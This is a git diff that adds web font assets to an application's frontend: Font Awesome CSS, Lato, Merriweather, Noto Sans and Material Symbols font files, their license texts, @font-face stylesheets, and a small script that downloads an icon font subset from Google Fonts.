+.fa-id-badge:before { + content: '\f2c1'; +} +.fa-drivers-license:before, +.fa-id-card:before { + content: '\f2c2'; +} +.fa-drivers-license-o:before, +.fa-id-card-o:before { + content: '\f2c3'; +} +.fa-quora:before { + content: '\f2c4'; +} +.fa-free-code-camp:before { + content: '\f2c5'; +} +.fa-telegram:before { + content: '\f2c6'; +} +.fa-thermometer-4:before, +.fa-thermometer:before, +.fa-thermometer-full:before { + content: '\f2c7'; +} +.fa-thermometer-3:before, +.fa-thermometer-three-quarters:before { + content: '\f2c8'; +} +.fa-thermometer-2:before, +.fa-thermometer-half:before { + content: '\f2c9'; +} +.fa-thermometer-1:before, +.fa-thermometer-quarter:before { + content: '\f2ca'; +} +.fa-thermometer-0:before, +.fa-thermometer-empty:before { + content: '\f2cb'; +} +.fa-shower:before { + content: '\f2cc'; +} +.fa-bathtub:before, +.fa-s15:before, +.fa-bath:before { + content: '\f2cd'; +} +.fa-podcast:before { + content: '\f2ce'; +} +.fa-window-maximize:before { + content: '\f2d0'; +} +.fa-window-minimize:before { + content: '\f2d1'; +} +.fa-window-restore:before { + content: '\f2d2'; +} +.fa-times-rectangle:before, +.fa-window-close:before { + content: '\f2d3'; +} +.fa-times-rectangle-o:before, +.fa-window-close-o:before { + content: '\f2d4'; +} +.fa-bandcamp:before { + content: '\f2d5'; +} +.fa-grav:before { + content: '\f2d6'; +} +.fa-etsy:before { + content: '\f2d7'; +} +.fa-imdb:before { + content: '\f2d8'; +} +.fa-ravelry:before { + content: '\f2d9'; +} +.fa-eercast:before { + content: '\f2da'; +} +.fa-microchip:before { + content: '\f2db'; +} +.fa-snowflake-o:before { + content: '\f2dc'; +} +.fa-superpowers:before { + content: '\f2dd'; +} +.fa-wpexplorer:before { + content: '\f2de'; +} +.fa-meetup:before { + content: '\f2e0'; +} +.sr-only { + position: absolute; + width: 1px; + height: 1px; + padding: 0; + margin: -1px; + overflow: hidden; + clip: rect(0, 0, 0, 0); + border: 0; +} +.sr-only-focusable:active, +.sr-only-focusable:focus { + position: static; + width: auto; + height: auto; + margin: 0; + overflow: visible; + clip: auto; +} diff --git a/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 b/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 new file mode 100644 index 0000000..4d13fc6 Binary files /dev/null and b/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 new file mode 100644 index 0000000..2615c85 Binary files /dev/null and 
b/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 b/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 new file mode 100644 index 0000000..f7bace1 Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 new file mode 100644 index 0000000..aaa5a35 Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 new file mode 100644 index 0000000..a4d084b Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 differ diff --git a/services/web/frontend/fonts/lato/OFL.txt b/services/web/frontend/fonts/lato/OFL.txt new file mode 100755 index 0000000..6d2c416 --- /dev/null +++ b/services/web/frontend/fonts/lato/OFL.txt @@ -0,0 +1,94 @@ +Copyright (c) 2010-2015, Łukasz Dziedzic (dziedzic@typoland.com), +with Reserved Font Name Lato. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. 
+ +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
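
(Editor's note: lato.css, in the next diff, declares the Lato family with the same @font-face pattern as dm-mono.css earlier in this commit — one rule per weight/style pair, woff2-only sources. A hedged usage sketch of how a stylesheet might reference these families; the selectors here are hypothetical illustrations, not rules from this commit.)

/* Illustrative only -- selectors are not part of this commit. */
body {
  font-family: 'Lato', sans-serif; /* resolves to the 400/700 faces in lato.css */
}
code {
  /* dm-mono.css sets font-display: fallback, so the generic monospace
     fallback is shown if the webfont is slow to load */
  font-family: 'DM Mono', monospace;
}
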
diff --git a/services/web/frontend/fonts/lato/lato.css b/services/web/frontend/fonts/lato/lato.css new file mode 100644 index 0000000..38c9eca --- /dev/null +++ b/services/web/frontend/fonts/lato/lato.css @@ -0,0 +1,27 @@ +@font-face { + font-family: 'Lato'; + font-style: normal; + font-weight: 400; + src: url('LatoLatin-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: italic; + font-weight: 400; + src: url('LatoLatin-Italic.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: normal; + font-weight: 700; + src: url('LatoLatin-Bold.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: italic; + font-weight: 700; + src: url('LatoLatin-BoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/material-symbols/LICENSE.txt b/services/web/frontend/fonts/material-symbols/LICENSE.txt new file mode 100644 index 0000000..7a4a3ea --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. 
+ + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. 
\ No newline at end of file diff --git a/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 new file mode 100644 index 0000000..08d6619 Binary files /dev/null and b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 differ diff --git a/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 new file mode 100644 index 0000000..14a5ef1 Binary files /dev/null and b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 differ diff --git a/services/web/frontend/fonts/material-symbols/build-unfilled.mjs b/services/web/frontend/fonts/material-symbols/build-unfilled.mjs new file mode 100644 index 0000000..1c37bc9 --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/build-unfilled.mjs @@ -0,0 +1,48 @@ +import path from 'node:path' +import fs from 'node:fs/promises' +import icons from './unfilled-symbols.mjs' + +const iconList = [...new Set(icons)].sort().map(encodeURIComponent).join(',') + +const url = `https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20,400,0,0&icon_names=${iconList}&display=block` +console.log(`Fetching font configuration from ${url}`) + +const cssFile = await ( + await fetch(url, { + headers: { + // Specify a user agent to get a woff2 file + 'User-Agent': + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', + }, + }) +).text() + +const woff2UrlText = cssFile.match(/url\(([^)]+)\) format\('woff2'\)/)?.[1] + +if (!woff2UrlText) { + throw new Error( + 'Could not find woff2 URL in CSS file, try accessing the font configuration URL to check whether an error is reported' + ) +} + +const woff2Url = new URL(woff2UrlText) +if (woff2Url.protocol !== 'https:') { + throw new Error(`Expected HTTPS URL, got ${woff2Url.protocol}`) +} +if (woff2Url.hostname !== 'fonts.gstatic.com') { + throw new Error( + `Expected to download font from fonts.gstatic.com, got ${woff2Url.hostname}` + ) +} + +console.log(`Fetching woff2 file: ${woff2Url}`) + +const outputPath = path.join( + import.meta.dirname, + 'MaterialSymbolsRoundedUnfilledPartialSlice.woff2' +) + +const res = await fetch(woff2Url) + +console.log(`Saving font file to ${outputPath}`) +await fs.writeFile(outputPath, res.body) diff --git a/services/web/frontend/fonts/material-symbols/material-symbols.css b/services/web/frontend/fonts/material-symbols/material-symbols.css new file mode 100644 index 0000000..6ffcdd4 --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/material-symbols.css @@ -0,0 +1,60 @@ +@font-face { + font-family: 'Material Symbols Rounded'; + font-style: normal; + font-weight: 400; + font-display: block; + /* + Generated from MaterialSymbolsRounded[FILL,GRAD,opsz,wght].woff2 with specific values: + 'FILL' 1, 'wght' 400, 'GRAD' 0, 'opsz' 20 + */ + src: url('MaterialSymbolsRoundedSlice.woff2') format('woff2'); +} + +@font-face { + font-family: 'Material Symbols Rounded Unfilled Partial'; + font-style: normal; + font-weight: 400; + font-display: block; + /* + Generated by frontend/fonts/material-symbols/build-unfilled.mjs + */ + src: url('MaterialSymbolsRoundedUnfilledPartialSlice.woff2') format('woff2'); +} + +.material-symbols { + font-family: 'Material Symbols Rounded'; + font-weight: normal; + font-style: 
normal; + font-size: 20px; + font-variation-settings: + 'FILL' 1, + 'wght' 400, + 'GRAD' 0, + 'opsz' 20; + line-height: 1; + letter-spacing: normal; + text-transform: none; + display: inline-block; + white-space: nowrap; + word-wrap: normal; + direction: ltr; + font-feature-settings: 'liga'; + -webkit-font-smoothing: antialiased; + + &.size-2x { + font-size: 2em; + } + + &.rotate-180 { + transform: rotate(180deg); + } + + &.unfilled { + font-family: 'Material Symbols Rounded Unfilled Partial'; + font-variation-settings: + 'FILL' 0, + 'wght' 400, + 'GRAD' 0, + 'opsz' 20; + } +} diff --git a/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs b/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs new file mode 100644 index 0000000..eca63fa --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs @@ -0,0 +1,28 @@ +// @ts-check +// Make sure to run the build-unfilled.mjs script after updating this list +// to update the font file with the latest icons. +// You may need to hard reload your browser window to see the changes. + +export default /** @type {const} */ ([ + 'book_5', + 'brush', + 'code', + 'create_new_folder', + 'description', + 'experiment', + 'forum', + 'help', + 'image', + 'info', + 'integration_instructions', + 'note_add', + 'picture_as_pdf', + 'rate_review', + 'report', + 'settings', + 'space_dashboard', + 'table_chart', + 'upload_file', + 'web_asset', + 'error', +]) diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 new file mode 100644 index 0000000..92d9d8a Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 new file mode 100644 index 0000000..33324b2 Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 new file mode 100644 index 0000000..828c324 Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 new file mode 100644 index 0000000..e5134cd Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/OFL.txt b/services/web/frontend/fonts/merriweather/OFL.txt new file mode 100644 index 0000000..042a4c4 --- /dev/null +++ b/services/web/frontend/fonts/merriweather/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2016 The Merriweather Project Authors (https://github.com/EbenSorkin/Merriweather), with Reserved Font Name "Merriweather". + +This Font Software is licensed under the SIL Open Font License, Version 1.1. 
+This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. 
The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/merriweather/merriweather.css b/services/web/frontend/fonts/merriweather/merriweather.css new file mode 100644 index 0000000..a2aef42 --- /dev/null +++ b/services/web/frontend/fonts/merriweather/merriweather.css @@ -0,0 +1,24 @@ +@font-face { + font-family: 'Merriweather'; + font-style: normal; + font-weight: 400; + src: url('Merriweather-Regular.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: italic; + font-weight: 400; + src: url('Merriweather-Italic.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: normal; + font-weight: 700; + src: url('Merriweather-Bold.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: italic; + font-weight: 700; + src: url('Merriweather-BoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 new file mode 100644 index 0000000..0894d11 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 new file mode 100644 index 0000000..769583f Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 new file mode 100644 index 0000000..10e723f Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 new file mode 100644 index 0000000..eaff027 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 new file mode 100644 index 0000000..89236c6 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBold.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 new file mode 100644 index 0000000..b7792cd Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-SemiBoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/OFL.txt b/services/web/frontend/fonts/noto-sans/OFL.txt new file mode 100644 index 0000000..6843f31 --- 
/dev/null +++ b/services/web/frontend/fonts/noto-sans/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2022 The Noto Project Authors (https://github.com/notofonts/latin-greek-cyrillic) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +https://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. 
